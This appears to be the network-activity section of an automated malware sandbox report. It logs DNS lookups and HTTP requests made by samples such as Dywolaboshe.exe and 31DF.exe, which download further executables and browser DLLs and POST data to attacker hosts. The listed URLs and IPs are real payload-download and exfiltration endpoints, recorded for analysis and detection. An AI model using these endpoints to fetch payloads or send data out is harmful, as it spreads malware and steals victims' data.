                                                                                          X-Powered-By: PHP/7.1.33
                                                                                          X-Powered-By: PleskLin
                                                                                        • GET
                                                                                          https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_TrueVPN
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.210.44:443
                                                                                          Request
                                                                                          GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_TrueVPN HTTP/1.1
                                                                                          Host: connectini.net
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:49 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.1.33
                                                                                          X-Powered-By: PleskLin
                                                                                        • GET
                                                                                          https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_kosmedia_Xtex
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.210.44:443
                                                                                          Request
                                                                                          GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_kosmedia_Xtex HTTP/1.1
                                                                                          Host: connectini.net
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:52 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.1.33
                                                                                          X-Powered-By: PleskLin
                                                                                        • POST
                                                                                          http://162.55.223.232/824
                                                                                          31DF.exe
                                                                                          Remote address:
                                                                                          162.55.223.232:80
                                                                                          Request
                                                                                          POST /824 HTTP/1.1
                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                          Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                          Content-Length: 25
                                                                                          Host: 162.55.223.232
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:38 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                        • GET
                                                                                          http://162.55.223.232/freebl3.dll
                                                                                          31DF.exe
                                                                                          Remote address:
                                                                                          162.55.223.232:80
                                                                                          Request
                                                                                          GET /freebl3.dll HTTP/1.1
                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                          Host: 162.55.223.232
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:38 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 334288
                                                                                          Connection: keep-alive
                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                          ETag: "519d0-57aa1f0b0df80"
                                                                                          Expires: Sat, 10 Jul 2021 23:04:38 GMT
                                                                                          Cache-Control: max-age=86400
                                                                                          X-Cache-Status: EXPIRED
                                                                                          X-Cache-Status: HIT
                                                                                          Accept-Ranges: bytes
                                                                                        • GET
                                                                                          http://162.55.223.232/mozglue.dll
                                                                                          31DF.exe
                                                                                          Remote address:
                                                                                          162.55.223.232:80
                                                                                          Request
                                                                                          GET /mozglue.dll HTTP/1.1
                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                          Host: 162.55.223.232
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:38 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 137168
                                                                                          Connection: keep-alive
                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                          ETag: "217d0-57aa1f0b0df80"
                                                                                          Expires: Sat, 10 Jul 2021 23:04:38 GMT
                                                                                          Cache-Control: max-age=86400
                                                                                          X-Cache-Status: EXPIRED
                                                                                          X-Cache-Status: HIT
                                                                                          Accept-Ranges: bytes
                                                                                        • GET
                                                                                          http://162.55.223.232/msvcp140.dll
                                                                                          31DF.exe
                                                                                          Remote address:
                                                                                          162.55.223.232:80
                                                                                          Request
                                                                                          GET /msvcp140.dll HTTP/1.1
                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                          Host: 162.55.223.232
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:38 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 440120
                                                                                          Connection: keep-alive
                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                          ETag: "6b738-57aa1f0b0df80"
                                                                                          Expires: Sat, 10 Jul 2021 23:04:38 GMT
                                                                                          Cache-Control: max-age=86400
                                                                                          X-Cache-Status: EXPIRED
                                                                                          X-Cache-Status: HIT
                                                                                          Accept-Ranges: bytes
                                                                                        • GET
                                                                                          http://162.55.223.232/nss3.dll
                                                                                          31DF.exe
                                                                                          Remote address:
                                                                                          162.55.223.232:80
                                                                                          Request
                                                                                          GET /nss3.dll HTTP/1.1
                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                          Host: 162.55.223.232
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:39 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 1246160
                                                                                          Connection: keep-alive
                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                          ETag: "1303d0-57aa1f0b0df80"
                                                                                          Expires: Sat, 10 Jul 2021 23:04:39 GMT
                                                                                          Cache-Control: max-age=86400
                                                                                          X-Cache-Status: EXPIRED
                                                                                          X-Cache-Status: HIT
                                                                                          Accept-Ranges: bytes
                                                                                        • GET
                                                                                          http://162.55.223.232/softokn3.dll
                                                                                          31DF.exe
                                                                                          Remote address:
                                                                                          162.55.223.232:80
                                                                                          Request
                                                                                          GET /softokn3.dll HTTP/1.1
                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                          Host: 162.55.223.232
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:39 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 144848
                                                                                          Connection: keep-alive
                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                          ETag: "235d0-57aa1f0b0df80"
                                                                                          Expires: Sat, 10 Jul 2021 23:04:39 GMT
                                                                                          Cache-Control: max-age=86400
                                                                                          X-Cache-Status: EXPIRED
                                                                                          X-Cache-Status: HIT
                                                                                          Accept-Ranges: bytes
                                                                                        • GET
                                                                                          http://162.55.223.232/vcruntime140.dll
                                                                                          31DF.exe
                                                                                          Remote address:
                                                                                          162.55.223.232:80
                                                                                          Request
                                                                                          GET /vcruntime140.dll HTTP/1.1
                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                          Host: 162.55.223.232
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:39 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 83784
                                                                                          Connection: keep-alive
                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                          ETag: "14748-57aa1f0b0df80"
                                                                                          Expires: Sat, 10 Jul 2021 23:04:39 GMT
                                                                                          Cache-Control: max-age=86400
                                                                                          X-Cache-Status: EXPIRED
                                                                                          X-Cache-Status: HIT
                                                                                          Accept-Ranges: bytes
                                                                                        • POST
                                                                                          http://162.55.223.232/
                                                                                          31DF.exe
                                                                                          Remote address:
                                                                                          162.55.223.232:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                          Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                          Content-Length: 3612
                                                                                          Host: 162.55.223.232
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:40 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Content-Encoding: gzip
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 180
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 58
                                                                                          Date: Fri, 09 Jul 2021 23:04:40 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 57
                                                                                          Date: Fri, 09 Jul 2021 23:04:41 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 264
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 56
                                                                                          Date: Fri, 09 Jul 2021 23:04:41 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 55
                                                                                          Date: Fri, 09 Jul 2021 23:04:44 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 54
                                                                                          Date: Fri, 09 Jul 2021 23:04:44 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 53
                                                                                          Date: Fri, 09 Jul 2021 23:04:48 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 52
                                                                                          Date: Fri, 09 Jul 2021 23:04:50 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 51
                                                                                          Date: Fri, 09 Jul 2021 23:04:52 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 50
                                                                                          Date: Fri, 09 Jul 2021 23:04:52 GMT
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          g-partners.live
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          g-partners.live
                                                                                          IN A
                                                                                          Response
                                                                                          g-partners.live
                                                                                          IN A
                                                                                          176.113.115.136
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://g-partners.live/installer.php?pub=five
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          176.113.115.136:80
                                                                                          Request
                                                                                          GET /installer.php?pub=five HTTP/1.1
                                                                                          Host: g-partners.live
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:40 GMT
                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                          X-Powered-By: PHP/5.4.16
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Transfer-Encoding: chunked
                                                                                          Content-Type: text/html
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          d.jumpstreetboys.com
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          d.jumpstreetboys.com
                                                                                          IN A
                                                                                          Response
                                                                                          d.jumpstreetboys.com
                                                                                          IN A
                                                                                          172.67.222.38
                                                                                          d.jumpstreetboys.com
                                                                                          IN A
                                                                                          104.21.62.88
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://d.jumpstreetboys.com/v2Y/installer.exe
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          172.67.222.38:443
                                                                                          Request
                                                                                          GET /v2Y/installer.exe HTTP/1.1
                                                                                          Host: d.jumpstreetboys.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          cf-request-id: 0b2f1d2d2700009c2d0500b000000001
                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gnAP2YyfWCdHVTiRD1m7jb2cyeogobo5Oa2kWKcMb6BJFx9ZEKY8zlFlbOr4NjkxU6USskwTe5eQY7sXVcQc91i0CWDFWqzeYstKRKYO9SlBKuPDs6jckhkDZ%2FoLiAXUYgY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c5315b7e519c2d-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          cache.uutww77.com
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          cache.uutww77.com
                                                                                          IN A
                                                                                          Response
                                                                                          cache.uutww77.com
                                                                                          IN A
                                                                                          172.67.171.54
                                                                                          cache.uutww77.com
                                                                                          IN A
                                                                                          104.21.29.4
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://cache.uutww77.com/juuu/ufgaa.exe
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          172.67.171.54:80
                                                                                          Request
                                                                                          GET /juuu/ufgaa.exe HTTP/1.1
                                                                                          Host: cache.uutww77.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:42 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 994816
                                                                                          Connection: keep-alive
                                                                                          Last-Modified: Wed, 05 May 2021 14:27:38 GMT
                                                                                          ETag: "6092ab5a-f2e00"
                                                                                          Accept-Ranges: bytes
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=KZHV8%2FmbINKjESbGDJUDnoK6GutPjAQoyvji6OypCwdK%2F2zx%2FKR2Lq9EYusRX5geFSH5Bv1lHAibLRPO1v261TGcZM%2Bevpu88YvP3fB1IrUJaCsJ3kZCZ2iPxXTaWA8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c5315f0ec6d8f1-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          a.xyzgame.vip
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          a.xyzgame.vip
                                                                                          IN A
                                                                                          Response
                                                                                          a.xyzgame.vip
                                                                                          IN A
                                                                                          104.21.40.13
                                                                                          a.xyzgame.vip
                                                                                          IN A
                                                                                          172.67.173.218
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://a.xyzgame.vip/userf/2202/google-game.exe
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          104.21.40.13:443
                                                                                          Request
                                                                                          GET /userf/2202/google-game.exe HTTP/1.1
                                                                                          Host: a.xyzgame.vip
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Date: Fri, 09 Jul 2021 23:04:45 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Location: https://b.xyzgame.cc/userf/2202/4c6b7cd617a0dcf2d783efd0d73e87ee.exe
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=UgZrJEc%2FxsgXbZqSFrqpE3FRE7LlcWtuWS1Pl%2BhWwT4cQiNktd4dd7vxn9ytr3hntvRtXh%2FU3U7dpAdcviIM2%2FXtbJqkJRK5dg7XFOIbIIsTmWYuZOOjebB1sw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c53171d8660b67-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          b.xyzgame.cc
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          b.xyzgame.cc
                                                                                          IN A
                                                                                          Response
                                                                                          b.xyzgame.cc
                                                                                          IN A
                                                                                          172.67.178.136
                                                                                          b.xyzgame.cc
                                                                                          IN A
                                                                                          104.21.51.99
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://b.xyzgame.cc/userf/2202/4c6b7cd617a0dcf2d783efd0d73e87ee.exe
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          172.67.178.136:443
                                                                                          Request
                                                                                          GET /userf/2202/4c6b7cd617a0dcf2d783efd0d73e87ee.exe HTTP/1.1
                                                                                          Host: b.xyzgame.cc
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:46 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Content-Disposition: attachment; filename="yanzhang.exe"
                                                                                          Content-Transfer-Encoding: binary
                                                                                          Vary: Accept-Encoding
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=L1tGtXXeCdS9wiw3OqF%2FTNomMlW0%2FHbvCgcJNJwyslSu%2BGRSTQz4iJj6tU9T2Uy3yZq2dN8vtjw45qZCBvH9WazQ7HY6gJxNoGlLdkGHJhoGqXx0eP8JYRLJ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c5317689714c7a-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          ip-api.com
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
